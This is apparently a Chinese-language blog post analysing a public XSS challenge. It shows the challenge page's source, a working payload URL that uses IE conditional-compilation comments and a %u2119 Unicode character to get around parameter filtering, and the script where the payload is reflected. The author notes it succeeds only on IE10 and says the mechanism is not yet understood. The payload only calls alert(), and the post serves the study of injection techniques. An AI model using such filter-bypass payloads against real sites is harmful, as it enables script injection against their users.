正常页面:
http://sdl.me/challenge1/xss3/JsChallenge3.asp?input1=Something
<html> <head> <SCRIPT language="Javascript"> function setid(id, name) { if (document.getElementById('Something').value > 10) { document.getElementById('Something').value = id; }else if (document.getElementById('Something').value > 0) { document.getElementById('test2').name = name; } self.close(); } //--> </script> </head> <body> ……
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert%28%22@kinugawamasato%20and%20@irsdl%22%29;{{//%20@end%20@*//*%27%29%29;};{1&in%u2119ut1=1}/*@cc_on%20@if%281%291;@else
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert([@kinugawamasato and @irsdl]);{{// @end @*//*’));};{1&inℙut1=1}/*@cc_on @if(1)1;@else
<SCRIPT language="Javascript"> function setid(id, name) { if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 10) { document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value = id; }else if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 0) { document.getElementById('test2').name = name; } self.close(); } //--> </script>
在IE10上确实成功了,但还没弄明白什么情况……其最后根本也没闭合注释符 */
其它 浏览器 ,Firefox,Chrome均不成功。
其中在URL中用到了%u2119 编码……
待解释。
查看更多关于SecProject Web AppSec 之XSS解析 第三篇 - 网站安全 -的详细内容...